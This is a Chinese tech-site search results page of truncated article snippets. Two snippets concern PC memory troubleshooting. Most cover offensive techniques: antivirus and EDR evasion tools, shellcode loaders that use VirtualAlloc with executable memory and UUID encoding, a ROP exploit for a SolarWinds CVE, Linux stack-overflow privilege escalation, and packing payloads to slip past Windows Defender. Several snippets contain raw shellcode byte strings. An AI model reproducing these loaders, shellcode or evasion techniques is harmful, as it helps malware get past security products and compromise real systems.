首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

电脑先别急,可能只是小问题

组装电脑蓝屏,客户搬过来重装系统,结果优盘启动,还没进入WinPe就蓝屏了,技术员把内存条拔下来,橡皮擦干净金手指,插回主板,结果电脑直接就亮了!紧张。。。...微星B360 Mortar主板,威刚8G内存,i5的CPU配个intel原装风扇,上面一层灰,摸着有点烫手,该不会是跟前几天的电脑一样,CPU核显热坏了工作了吧?...清理风扇,插个独立显卡上去还是,发现主板上的简易侦错指示灯,Dram等亮起,这是内存没检测到或者有故障的意思。结合之前的蓝屏,初步判断内存条故障。...顺手换个测试用的内存,还是,不可能4个内存插槽都是坏的,难道主板问题?短接JBAT1,清除CMOS,电脑顺利点亮,进系统还是蓝屏,好在重装系统后一切正常了。 “烤机”2小时没问题,通知客户取机。

71310
您找到你想要的搜索结果了吗?
是的
没有找到

如何使用Killer绕过AV和EDR等安全检测产品

功能介绍 1、实现了针对内存扫描绕过的Module Stomping技术; 2、通过刷新ntdll副本解DLL钩子; 3、IAT隐藏和混淆&API解钩子; 4、实现了用于用于绕过某些安全控制的...包含沙盒规避技术和基本反调试; 6、通过XOR实现完全代码混淆(函数-键-Shellcode); 7、Shellcode混淆、反混淆和加密; 8、在不使用API的情况下将Payload移动到内存中...; 9、在创建新线程的情况下运行,支持x64和x86架构; 工具下载 广大研究人员可以使用下列命令将该项目源码克隆至本地: git clone https://github.com/0xHossam...x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\

30220

创建漏洞利用:SolarWinds 漏洞 CVE-2021-35211

我手动做了很多这样的工作,以更好地演示编写 ROP 漏洞利用所涉及的步骤;也许在以后的博客文章中,我将讨论如何使用像 Mona 这样的自动化工具来做到这一。...以上前三都是相互交织的,所以我将同时处理它们。r9问题是:为了启动我们的 ROP 链漏洞,我应该放入什么内存地址?...读取内存地址处的值rax并将其存储在rax寄存器中。 例如,如果rax=0x123456789上面的指令读取内存地址的 8 个字节0x123456789并将该值存储在rax寄存器中。...注意:我建议红队参与,因为你仍然会被无数其他控件抓住。但对于简单的用例,弹出一个连接回壳或Sliver会话就足够了。...结果,我可以简单地查看在调用获取的堆栈跟踪call r9并记下那里的地址。

1.9K20

Linux通过栈溢出进行提权实战

NFS使用远程过程调用(RPC)在客户端和服务器之间路由请求。Root Squashing参数阻止对连接到NFS卷的远程root用户具有root访问权限。...尝试http下载但没有成功,以后遇到bash反弹的就架个服务器,遇到ssh的还是用sftp更方便; ? 我这里用得是MobaXterm;运行下程序看看; ?...那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过 3、NX:NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行...\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42...\x75\x4a\x49\x35" "\x61\x58\x49\x4c\x49\x48\x4b\x50\x6a\x51\x56\x51\x48\x68\x4d" "\x4b\x30\x42\x4a\x53

1.8K10

免杀tips——敏感函数处理过国内主流杀软

✎ 阅读须知 乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。...目前市面上的绝大多数杀软基于判断一个exe是否为木马,无非就是敏感函数或是调用敏感的api、特征库匹配、hash值、监控内存之类的 ,所以静态的还是比较好过的,稍微处理一下自己的shellcode基本上是都可以过的...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\...大小 shellcode_size = sizeof(buf); /* VirtualAlloc( NULL, // 基址 800, // 大小 MEM_COMMIT, // 内存页状态...NULL, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // 将shellcode复制到可执行的内存页中

1.1K40

构建ROP链实现远程栈溢出

如上图就是运行后的FTP服务器,通过nc工具链接服务端的地址nc 192.168.1.8 9999 可以得到一个FTP交互环境,此时可以执行send | hello world命令,来向服务器发送一段字符串...,同时服务器会返回给你Data received successfully这样的提示信息,好了我们开始分析程序并挖掘漏洞吧。...此时我们需要寻找一个跳板,能够动态的定位栈地址的位置,在这里我们使用jmp esp作为跳板指针,其基本思路是,使用内存中任意一个jmp esp地址覆盖返回地址,函数返回后被重定向去执行内存中jmp esp...\x2b" buf += b"\xc9\xb1\x56\x83\xe8\xfc\x31\x58\x0f\x03\x58\xb1\x43" buf += b"\xbb\xc7\x25\x01\x44\x38...小总结: 上方我们所演示的就是典型的基于内存的攻击技术,该技术的优势就是几乎很难被发现,100%的利用成功率,内存攻击技术就是利用了软件的安全漏洞,该漏洞的产生表面上是开发人员没有对缓冲区进行合理的检测

76520

pyinstaller打包逆向分析,顺便免杀Windows Defender

✎ 阅读须知 乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。...设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存...设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存...设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存...ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) 报毒 删除一段,查杀: 正常 再加入一段,查杀 正常 这说明查杀的就在后面一段中

2.3K20

红队技巧-利用uuid加载shellcode

y 点击蓝字关注我哦 近期国外的Tweet上面的Check Point Research发布了一篇有趣的推文: 这篇推文大概讲的是通过分析了一个恶意样本,找到一种非常有趣的向内存写入shellcode...rift-analysing-a-lazarus-shellcode-execution-method/ 值得注意的是: 在自定义代码中,攻击者使用了windows api 遍历了大量硬编码 UUID 值列表,并且每次都提供指向分配内存...还有需要注意的,就是windows 二进制字节序列是用的小端计数法,转换时且二进制序列必须16个字符为一组。 2.EnumSystemLocalesA 微软官方文档: ?...exec,0); 利用uuid来加载shellcode,上线cs 我们先来看普通的shellcode 的c加载方式 #include #include #弹窗...0, 0);//获得可执行的句柄 void* ha = HeapAlloc(hc, 0, 0x100000);//申请堆空间 if (ha == NULL) { cout << "内存申请失败

1.1K10

红队技巧-利用uuid加载shellcode

近期国外的Tweet上面的Check Point Research发布了一篇有趣的推文: 这篇推文大概讲的是通过分析了一个恶意样本,找到一种非常有趣的向内存写入shellcode方式。...rift-analysing-a-lazarus-shellcode-execution-method/ 值得注意的是: 在自定义代码中,攻击者使用了windows api 遍历了大量硬编码 UUID 值列表,并且每次都提供指向分配内存...还有需要注意的,就是windows 二进制字节序列是用的小端计数法,转换时且二进制序列必须16个字符为一组。 2.EnumSystemLocalesA 微软官方文档: ?...exec,0); 利用uuid来加载shellcode,上线cs 我们先来看普通的shellcode 的c加载方式 #include #include #弹窗...0, 0);//获得可执行的句柄 void* ha = HeapAlloc(hc, 0, 0x100000);//申请堆空间 if (ha == NULL) { cout << "内存申请失败

1.7K30

免杀|记一次cs样本免杀实践

:这个检测的时间点在虚拟化运行检测之后,一般是虚拟化检测没问题,用户自己在物理机运行的时候,杀软可以随时将运行的可执行文件内存dump下来,进行检测;这里我们简单说下方法论,展开说细节,后文提到的技术再展开说...;首先是如何绕过虚拟化检测:核心就是不让虚拟环境接触到我们的shellcode1、样本做一些虚拟化环境、沙箱做不了的操作;2、样本检查是否存在虚拟化环境、沙箱特征然后释放恶意代码;然后是如何绕过内存dump...\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\...\\x58\\x58\\x48\\x05\\x00\\x00\\x00\\x00\\x50\\xc3\\xe8\\x9f\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\...1、通过虚拟化运行检测:2、真实运行内存检测1、对抗虚拟化运行检查(虚拟沙箱)检查沙箱特征运行:笔者在今年hw的时候分析了一些样本,其中又一些做了一些反虚拟化和反沙箱操作,这里我们直接借鉴,然后稍加增补即可

64310

红队作业 | 钉钉机器人远控服务器体验

本次作业是使用钉钉机器人来实现远控服务器!...1、登录钉钉开放平台 可以先创建一个企业 选择应用开发,企业内部开发,添加一个机器人 记录生成的密钥 配置好开发管理,服务器出口IP添加VPS的地址,消息接收地址为一个可以接收数据的url,该url...验证不通过') print('有get请求') if __name__ == '__main__': app.run(host='0.0.0.0', port=9000) 3、在开发管理的服务器上启动服务...4、调试 在钉钉开放平台上选择调试 打开钉钉,会有一个TEST版本的群聊,可以在里面进行测试 可以看到,命令执行成功,服务器端请求成功 参考: 钉钉机器人设置: https://open.dingtalk.com...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" buf += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59

1.5K20

免杀必会- 规避杀软的库

加密库 做免杀时或自己开发c2时,加密话题是永远离不开的,无论是代码加密,流量加密,或者是内存加密,都是十分重要的,且必须的环节,windows 中也有许多和加密有关的库,但是比较常用的和加密效果比较好的...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\...; i < shellcodeSize - 1; i++) { printf("\\x%02x", shellcode[i]); } printf("\n"); } 这种可以用来,加密内存...github地址:https://github.com/jthuraisamy/SysWhispers2 之前我有一篇文章:手把手教你使用系统调用,也是讲的这个,那个比较详细,所以这里细讲。...\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\

1.1K20

【免杀】C++静态免杀学习

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。...复现其他师傅的免杀 2.1 c++部分 其实他这部分代码的逻辑就是一个利用自己的密钥进行解密,解密之后再申请内存,执行shellcode,在这里先将别人的代码下载下来,在本地跑一下: 先把项目下载,然后把...xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\...\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\

2K30

计算机硬件:内存

内存介绍 内存是计算机中CPU和硬盘数据交互的桥梁。默认情况下,CPU从内存读写数据,内存从硬盘读写数据。...为了提升效率,一般在开机或者软件在运行的时候,会将常用数据直接从硬盘直接读入内存,以待后续CPU使用,提高计算机运行效率。...内存条分为:笔记本、台式机 内存选购 选购参数:容量、频率 选购多条内存或者升级计算机内存的时候,最好选购同品牌,同频率的产品,否则会有兼容问题,会造成蓝屏或重启。...内存常见故障 台式机开机显示器 台式机运行了一段后突然一天开机显示器()的情况,一般是由于内存条上的金手指(内存和主板插槽接触的铜片)氧化,拔下来用橡皮或者粗糙的纸擦擦就好了

82210
领券